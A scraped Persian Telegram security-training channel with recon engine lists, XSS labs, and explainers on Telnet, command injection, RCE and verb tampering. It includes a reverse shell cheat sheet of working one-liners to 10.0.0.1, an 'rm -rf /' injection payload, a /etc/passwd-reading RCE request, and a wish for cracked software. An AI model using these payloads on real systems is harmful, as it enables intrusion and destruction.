🔍 Search Engines for Bug hunter & Security Pro : [ Recon is the key ]
1. https://google.com - Dorks
2. https://shodan.io - Servers
3. https://censys.io - Servers
4. https://hunter.io - Mail addresses
5. https://fullhunt.io - Attack Surface
6. https://onyphe.io - Servers
7. https://socradar.io - Threat Intelligence
8. https://binaryedge.io - Attack Surface
9. https://intelx.io - OSINT
10. https://crt.sh - Certificate search
11. https://vulners.com - Vulnerabilities
12. https://securitytrails.com - Servers
#CyberSecurity #bugbounty #bugbountytips
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
1. https://google.com - Dorks
2. https://shodan.io - Servers
3. https://censys.io - Servers
4. https://hunter.io - Mail addresses
5. https://fullhunt.io - Attack Surface
6. https://onyphe.io - Servers
7. https://socradar.io - Threat Intelligence
8. https://binaryedge.io - Attack Surface
9. https://intelx.io - OSINT
10. https://crt.sh - Certificate search
11. https://vulners.com - Vulnerabilities
12. https://securitytrails.com - Servers
#CyberSecurity #bugbounty #bugbountytips
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Shodan
Search engine of Internet-connected devices. Create a free account to get started.
👍9❤1
🗽چلنج هایی برای تمرین XSS
prompt.ml
alf.nu/alert1
xss-game.appspot.com
polyglot.innerht.ml
sudo.co.il/xss
root-me.org
chefsecure.com
wechall.net
codelatte.id/labs/xss
#lab #Challenges #xss
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
prompt.ml
alf.nu/alert1
xss-game.appspot.com
polyglot.innerht.ml
sudo.co.il/xss
root-me.org
chefsecure.com
wechall.net
codelatte.id/labs/xss
#lab #Challenges #xss
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍6❤1
🤖پروتکلی کهنه ولی کاربردی
Telnet:
یه پروتکل شبکه مبتنی بر متن هست که به شما اجازه میده از راه دور به یه کامپیوتر دیگه وصل بشید و دستورات رو اجرا کنید.
☕️کاربردهای Telnet:
مدیریت از راه دور: Telnet یه ابزار قدرتمند برای مدیریت از راه دور سرورها، روترها و سایر تجهیزات شبکه هست.
عیب یابی: با Telnet میتونید مشکلات شبکه رو عیب یابی کنید و علت خطاها رو پیدا کنید.
آزمایش پورت ها: Telnet یه روش ساده برای اسکن پورت های یه کامپیوتر و بررسی باز یا بسته بودن اونهاست.
آموزش: Telnet میتونه یه ابزار آموزشی مفید برای یادگیری مفاهیم پایه ای شبکه و دستورات لینوکس باشه.
🕳چالشهای امنیتی Telnet:
وTelnet یه پروتکل ناامن هست که اطلاعات رو به صورت واضح (Plain Text) ارسال میکنه.
این موضوع Telnet رو به یه طعمه لذیذ برای هکرها تبدیل کرده و استفاده از اون در دنیای امروز که خطرات سایبری به طور چشمگیری افزایش پیدا کردن، به شدت غیرقابل توصیه هست.
🪃مشکلات امنیتی Telnet:
عدم رمزنگاری: اطلاعات ارسالی و دریافتی در Telnet به صورت رمزنگاری نشده هستن و به راحتی قابل رهگیری و شنود توسط هکرها هستن.
حمله Man-in-the-Middle: هکرها میتونن بین شما و کامپیوتر مقصد قرار بگیرن و به تمام اطلاعات ارسالی و دریافتی دسترسی پیدا کنن.
جعل هویت: هکرها میتونن با جعل هویت شما، به کامپیوتر مقصد متصل بشن و دستورات مخرب اجرا کنن.
جایگزینهای امنتر Telnet:
با توجه به مشکلات امنیتی Telnet، استفاده از جایگزینهای امنتر به شدت توصیه میشه.
جایگزینی برای داشتن ارتباط امن:
SSH:
یه پروتکل امن برای اتصال از راه دور هست که از رمزنگاری قوی برای محافظت از اطلاعات استفاده میکنه.
#Telnet #امنیت_وب #هک #آسیب_پذیری #اسکن #نفوذ
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Telnet:
یه پروتکل شبکه مبتنی بر متن هست که به شما اجازه میده از راه دور به یه کامپیوتر دیگه وصل بشید و دستورات رو اجرا کنید.
☕️کاربردهای Telnet:
مدیریت از راه دور: Telnet یه ابزار قدرتمند برای مدیریت از راه دور سرورها، روترها و سایر تجهیزات شبکه هست.
عیب یابی: با Telnet میتونید مشکلات شبکه رو عیب یابی کنید و علت خطاها رو پیدا کنید.
آزمایش پورت ها: Telnet یه روش ساده برای اسکن پورت های یه کامپیوتر و بررسی باز یا بسته بودن اونهاست.
آموزش: Telnet میتونه یه ابزار آموزشی مفید برای یادگیری مفاهیم پایه ای شبکه و دستورات لینوکس باشه.
🕳چالشهای امنیتی Telnet:
وTelnet یه پروتکل ناامن هست که اطلاعات رو به صورت واضح (Plain Text) ارسال میکنه.
این موضوع Telnet رو به یه طعمه لذیذ برای هکرها تبدیل کرده و استفاده از اون در دنیای امروز که خطرات سایبری به طور چشمگیری افزایش پیدا کردن، به شدت غیرقابل توصیه هست.
🪃مشکلات امنیتی Telnet:
عدم رمزنگاری: اطلاعات ارسالی و دریافتی در Telnet به صورت رمزنگاری نشده هستن و به راحتی قابل رهگیری و شنود توسط هکرها هستن.
حمله Man-in-the-Middle: هکرها میتونن بین شما و کامپیوتر مقصد قرار بگیرن و به تمام اطلاعات ارسالی و دریافتی دسترسی پیدا کنن.
جعل هویت: هکرها میتونن با جعل هویت شما، به کامپیوتر مقصد متصل بشن و دستورات مخرب اجرا کنن.
جایگزینهای امنتر Telnet:
با توجه به مشکلات امنیتی Telnet، استفاده از جایگزینهای امنتر به شدت توصیه میشه.
جایگزینی برای داشتن ارتباط امن:
SSH:
یه پروتکل امن برای اتصال از راه دور هست که از رمزنگاری قوی برای محافظت از اطلاعات استفاده میکنه.
#Telnet #امنیت_وب #هک #آسیب_پذیری #اسکن #نفوذ
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍8❤1
💀دنیای ناشناخته ی JavaScript
یه چلنج از root-me که شمارو با دنیای دیگه از javascript آشنا میکنه:
https://www.root-me.org/en/Challenges/Web-Client/Javascript-Native-code
#js #javascript #root_me #جاوااسکریپت #Challenges
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
یه چلنج از root-me که شمارو با دنیای دیگه از javascript آشنا میکنه:
https://www.root-me.org/en/Challenges/Web-Client/Javascript-Native-code
#js #javascript #root_me #جاوااسکریپت #Challenges
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍6❤2🤔1
Security hint
🐝ارسال درخواست با جاوا اسکریپت: یکی از دانش های مورد نیاز از جاوا اسکریپت ارسال درخواست (http) هست. دو روش رایج برای ارسال درخواست با جاوا اسکریپت وجود دارد: 1. استفاده از XML HttpRequest (XHR) 2. استفاده از Fetch API مدرنتر و کاربرپسندتر است ارسال…
🍥ارسال درخواستهای Fetch API در جاوا اسکریپت
در این پست، به بررسی نحوه ارسال درخواستهای GET و POST با استفاده از Fetch API در جاوا اسکریپت می پردازیم. Fetch API یک رابط مدرن و قدرتمند برای انجام درخواستهای HTTP در مرورگرهای وب است.
💥GET request
یک درخواست GET برای دریافت اطلاعات از یک سرور استفاده میشود. برای ارسال یک درخواست GET با Fetch API، مراحل زیر را دنبال کنید:
💥POST request
یک درخواست POST برای ارسال اطلاعات به یک سرور استفاده میشود. برای ارسال یک درخواست POST با Fetch API، مراحل زیر را دنبال کنید:
#JavaScript #FetchAPI #GET #POST #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
در این پست، به بررسی نحوه ارسال درخواستهای GET و POST با استفاده از Fetch API در جاوا اسکریپت می پردازیم. Fetch API یک رابط مدرن و قدرتمند برای انجام درخواستهای HTTP در مرورگرهای وب است.
💥GET request
یک درخواست GET برای دریافت اطلاعات از یک سرور استفاده میشود. برای ارسال یک درخواست GET با Fetch API، مراحل زیر را دنبال کنید:
fetch('https://api.example.com/data')
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error(error));💥POST request
یک درخواست POST برای ارسال اطلاعات به یک سرور استفاده میشود. برای ارسال یک درخواست POST با Fetch API، مراحل زیر را دنبال کنید:
const data = { name: 'Alice', age: 30 };
const jsonData = JSON.stringify(data);
fetch('https://api.example.com/users', {
method: 'POST',
body: jsonData,
headers: { 'Content-Type': 'application/json' }
})
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error(error));#JavaScript #FetchAPI #GET #POST #پیشنیاز #جاوااسکریپت #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤5🦄1
Security hint
👻👻👻👻👻👻👻 براتون اینجا گذاشتم https://youtu.be/B7Sn709pLVE 😉😉😉
👑Reverse Shell Cheat Sheet
Bash:
Python:
PERL:
PHP:
Ruby:
Netcat:
Java:
xterm:
#Reverse_Shell #Cheat_Sheet
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Bash:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'PERL:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'PHP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'Netcat:
nc -e /bin/sh 10.0.0.1 1234
Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm:
xterm -display 10.0.0.1:1
#Reverse_Shell #Cheat_Sheet
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤6👍3👻1
☠️جایگزینی برای BurpSuite
https://freedium.cfd/https://medium.com/@lmoise2022/one-of-the-newest-tools-in-pentesting-b93e8434c08a
اپدیت: البته این تولز رایگان نیست، اگه کرک بشه عالی میشه🥲
#BurpSuite #Caido #tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
https://freedium.cfd/https://medium.com/@lmoise2022/one-of-the-newest-tools-in-pentesting-b93e8434c08a
اپدیت: البته این تولز رایگان نیست، اگه کرک بشه عالی میشه🥲
#BurpSuite #Caido #tools
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍4
javascript-beginner-handbook.pdf
544.7 KB
📖 هنوز JavaScript یاد نگرفتی؟؟
پس از این کتاب برای شروع استفاده کن ...
خلاصه و ساده مباحث رو توضیح داده ☺️
#book #javascript #beginner
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
پس از این کتاب برای شروع استفاده کن ...
خلاصه و ساده مباحث رو توضیح داده ☺️
#book #javascript #beginner
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
❤8👍2💯2🔥1
Web Hacking 101.pdf
6.1 MB
📕معرفی یک کتاب دیگه که برای شروع میتونید بخونیدش و با ابزار های رایج آشنا بشید
(یه قسمت هایی کامنت فارسی هم داره)
#book #security #BugBounty
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
(یه قسمت هایی کامنت فارسی هم داره)
#book #security #BugBounty
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👌4❤2👍1
🔒 آشنایی با Command Injection و RCE 🔒
Command Injection
📌 تعریف: Command Injection یا تزریق دستورات، نوعی آسیبپذیری است که در آن مهاجم میتواند دستورات سیستمی را به یک برنامه تحت وب یا نرمافزار وارد کند و آنها را اجرا کند. این نوع حمله زمانی ممکن میشود که ورودیهای کاربر بدون اعتبارسنجی مناسب مستقیماً به خط فرمان سیستم عامل ارسال شوند.
⚠️ مثال: فرض کنید یک وبسایت فرمی دارد که نام دامنهای را از کاربر میگیرد و آن را پینگ میکند:
اگر کاربر به جای وارد کردن نام دامنه، این ورودی را وارد کند:
این دستور مخرب
Remote Code Execution (RCE)
📌 تعریف: RCE نوعی آسیبپذیری است که به مهاجم اجازه میدهد کد دلخواه خود را از راه دور بر روی سیستم هدف اجرا کند. این آسیبپذیریها بسیار خطرناک هستند زیرا مهاجم میتواند کنترل کامل سیستم را در دست بگیرد.
⚠️ مثال: فرض کنید یک برنامه وب آسیبپذیری دارد که به مهاجم اجازه میدهد کد PHP دلخواه خود را از طریق یک درخواست HTTP ارسال و اجرا کند:
مهاجم میتواند با ارسال یک درخواست به این صفحه، کد مخربی را اجرا کند:
این دستور محتویات فایل حساس /etc/passwd را نمایش میدهد.
📌تفاوت Command Injection و RCE
یک- Command Injection بیشتر به تزریق دستورات سیستمعامل اشاره دارد که توسط برنامه آسیبپذیر اجرا میشوند.
دو- RCE به اجرای کد دلخواه مهاجم روی سیستم هدف از راه دور اشاره دارد. این کد میتواند هر چیزی باشد، از جمله اسکریپتهای پیچیده یا برنامههای مخرب.
🔺چطور میتوان از این حملات جلوگیری کرد؟
✅ اعتبارسنجی ورودیها: هرگز ورودیهای کاربر را بدون اعتبارسنجی و تصحیح ارسال نکنید.
✅ استفاده از توابع امن: از توابع و کتابخانههایی استفاده کنید که برای اجرای دستورات و ارتباط با سیستم عامل طراحی شدهاند و در برابر تزریقها مقاوم هستند.
✅ بروزرسانی منظم نرمافزارها: همیشه نرمافزارها و کتابخانههای خود را به آخرین نسخه بروز نگه دارید تا از رفع آسیبپذیریها بهرهمند شوید.
#Command_Injection #RCE #تزریق_دستورات #اجرای_کد_از_راه_دور
🌐Sec_Hint & Boost & Youtube
Command Injection
📌 تعریف: Command Injection یا تزریق دستورات، نوعی آسیبپذیری است که در آن مهاجم میتواند دستورات سیستمی را به یک برنامه تحت وب یا نرمافزار وارد کند و آنها را اجرا کند. این نوع حمله زمانی ممکن میشود که ورودیهای کاربر بدون اعتبارسنجی مناسب مستقیماً به خط فرمان سیستم عامل ارسال شوند.
⚠️ مثال: فرض کنید یک وبسایت فرمی دارد که نام دامنهای را از کاربر میگیرد و آن را پینگ میکند:
import os
domain = input("Enter domain to ping: ")
os.system("ping " + domain)
اگر کاربر به جای وارد کردن نام دامنه، این ورودی را وارد کند:
google.com; rm -rf /
این دستور مخرب
rm -rf / (که کل سیستم را پاک میکند) به دنبال دستور پینگ اجرا میشود، چون ورودی کاربر مستقیماً به خط فرمان ارسال شده است.Remote Code Execution (RCE)
📌 تعریف: RCE نوعی آسیبپذیری است که به مهاجم اجازه میدهد کد دلخواه خود را از راه دور بر روی سیستم هدف اجرا کند. این آسیبپذیریها بسیار خطرناک هستند زیرا مهاجم میتواند کنترل کامل سیستم را در دست بگیرد.
⚠️ مثال: فرض کنید یک برنامه وب آسیبپذیری دارد که به مهاجم اجازه میدهد کد PHP دلخواه خود را از طریق یک درخواست HTTP ارسال و اجرا کند:
<?php
$code = $_GET['code'];
eval($code);
?>
مهاجم میتواند با ارسال یک درخواست به این صفحه، کد مخربی را اجرا کند:
https://vulnerable-website.com/vulnerable.php?code=system('cat /etc/passwd');این دستور محتویات فایل حساس /etc/passwd را نمایش میدهد.
📌تفاوت Command Injection و RCE
یک- Command Injection بیشتر به تزریق دستورات سیستمعامل اشاره دارد که توسط برنامه آسیبپذیر اجرا میشوند.
دو- RCE به اجرای کد دلخواه مهاجم روی سیستم هدف از راه دور اشاره دارد. این کد میتواند هر چیزی باشد، از جمله اسکریپتهای پیچیده یا برنامههای مخرب.
🔺چطور میتوان از این حملات جلوگیری کرد؟
✅ اعتبارسنجی ورودیها: هرگز ورودیهای کاربر را بدون اعتبارسنجی و تصحیح ارسال نکنید.
✅ استفاده از توابع امن: از توابع و کتابخانههایی استفاده کنید که برای اجرای دستورات و ارتباط با سیستم عامل طراحی شدهاند و در برابر تزریقها مقاوم هستند.
✅ بروزرسانی منظم نرمافزارها: همیشه نرمافزارها و کتابخانههای خود را به آخرین نسخه بروز نگه دارید تا از رفع آسیبپذیریها بهرهمند شوید.
#Command_Injection #RCE #تزریق_دستورات #اجرای_کد_از_راه_دور
🌐Sec_Hint & Boost & Youtube
👍11👻1🦄1
👻13🦄9👍6
✍🏻آشنایی با Burp suite
این رایتاپ خیلی خوب قسمت های مختلف burp رو توضیح داده
https://caioluchetti.medium.com/how-to-use-burp-suite-for-pentest-dbc9b0f7fe8d
#writeup #burp_suite #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
این رایتاپ خیلی خوب قسمت های مختلف burp رو توضیح داده
https://caioluchetti.medium.com/how-to-use-burp-suite-for-pentest-dbc9b0f7fe8d
#writeup #burp_suite #آموزش
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
Medium
How to use Burp Suite for Pentest
Master the Essential Tools for Web Penetration Testing with Burp Suite.
👍5❤3👻1
Security hint
📣یه ویدیو کوتاه اماده کردم ... کی بزارم ؟🤔🤔🤔 امشب👻 ؟یا یه شب دیگه 🦄؟ #YouTube
منکه دیشب گذاشتم ولی کی دید کی ندید؟
https://youtu.be/eY2ADdsUyNo?si=U9CRM-cLsMAyTwbZ
#YouTube #Recon
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
https://youtu.be/eY2ADdsUyNo?si=U9CRM-cLsMAyTwbZ
#YouTube #Recon
ممنون که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
YouTube
رازهای موفقیت در باگ بانتی: چرا ریکان مهم است؟
یکی از کارهایی که لازمه توی باگ بانتی انجام بدین ریکان هست ولی چرا ؟ و توی ریکان باید به چی برسین؟
❤9🤩2😁1👻1
🔍 آشنایی با Verb Tampering
🎭 Verb Tampering
به معنای تغییر نوع درخواستهای HTTP (مانند GET، POST، PUT، DELETE) است تا با تغییر متد درخواست، به منابع غیرمجاز دسترسی پیدا کنید یا محدودیتهای امنیتی را دور بزنید. این تکنیک یکی از روشهای محبوب هکرها برای سوءاستفاده از ضعفهای امنیتی در برنامههای وب است.
📚 مثال عملی
فرض کنید یک فرم ورود در یک وبسایت فقط از متد POST برای ارسال دادهها استفاده میکند. اگر بتوانید نوع درخواست را به GET تغییر دهید، ممکن است به اطلاعات حساس دسترسی پیدا کنید یا رفتار غیرمنتظرهای از سرور مشاهده کنید.
🛠️ چگونه Verb Tampering را تست کنیم؟
1. بررسی متدهای مجاز: با استفاده از ابزارهای پنتست مانند Burp Suite، انواع متدهای HTTP را تست کنید و ببینید سرور چگونه به اونها پاسخ میده و آیا میتوانید به اطلاعات غیرمجاز دسترسی پیدا کنید.
۲. تحلیل پاسخها: پاسخهای سرور را به دقت تحلیل کنید تا متوجه شوید که آیا اطلاعات حساس لو رفته یا محدودیتهای امنیتی دور زده شده است.
🔧 راههای جلوگیری از Verb Tampering
به عنوان یک پنتستر، علاوه بر شناسایی ضعفها، باید راهکارهای جلوگیری را نیز بدونید:
1. محدود کردن متدهای HTTP: مطمئن شوید سرور فقط متدهای مورد نیاز را میپذیرد.
2. اعتبارسنجی سمت سرور: درخواستها را در سمت سرور اعتبارسنجی کنید و فقط متدهای مجاز را قبول کنید.
3. استفاده از توکنهای CSRF: با توکنهای CSRF از اعتبار درخواستها مطمئن شوید.
4. پیادهسازی کنترل دسترسی مناسب: اطمینان حاصل کنید که هر کاربر فقط به منابع و عملکردهای مجاز دسترسی دارد.
موفق باشید و همیشه در حال یادگیری باشید!🚀
#verb_tampering #pentest
که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
🎭 Verb Tampering
به معنای تغییر نوع درخواستهای HTTP (مانند GET، POST، PUT، DELETE) است تا با تغییر متد درخواست، به منابع غیرمجاز دسترسی پیدا کنید یا محدودیتهای امنیتی را دور بزنید. این تکنیک یکی از روشهای محبوب هکرها برای سوءاستفاده از ضعفهای امنیتی در برنامههای وب است.
📚 مثال عملی
فرض کنید یک فرم ورود در یک وبسایت فقط از متد POST برای ارسال دادهها استفاده میکند. اگر بتوانید نوع درخواست را به GET تغییر دهید، ممکن است به اطلاعات حساس دسترسی پیدا کنید یا رفتار غیرمنتظرهای از سرور مشاهده کنید.
🛠️ چگونه Verb Tampering را تست کنیم؟
1. بررسی متدهای مجاز: با استفاده از ابزارهای پنتست مانند Burp Suite، انواع متدهای HTTP را تست کنید و ببینید سرور چگونه به اونها پاسخ میده و آیا میتوانید به اطلاعات غیرمجاز دسترسی پیدا کنید.
۲. تحلیل پاسخها: پاسخهای سرور را به دقت تحلیل کنید تا متوجه شوید که آیا اطلاعات حساس لو رفته یا محدودیتهای امنیتی دور زده شده است.
🔧 راههای جلوگیری از Verb Tampering
به عنوان یک پنتستر، علاوه بر شناسایی ضعفها، باید راهکارهای جلوگیری را نیز بدونید:
1. محدود کردن متدهای HTTP: مطمئن شوید سرور فقط متدهای مورد نیاز را میپذیرد.
2. اعتبارسنجی سمت سرور: درخواستها را در سمت سرور اعتبارسنجی کنید و فقط متدهای مجاز را قبول کنید.
3. استفاده از توکنهای CSRF: با توکنهای CSRF از اعتبار درخواستها مطمئن شوید.
4. پیادهسازی کنترل دسترسی مناسب: اطمینان حاصل کنید که هر کاربر فقط به منابع و عملکردهای مجاز دسترسی دارد.
موفق باشید و همیشه در حال یادگیری باشید!🚀
#verb_tampering #pentest
که مارو به دوستاتون معرفی میکنید🥰
🌐Sec_Hint & Boost & Youtube
👍7❤2🔥1👌1👻1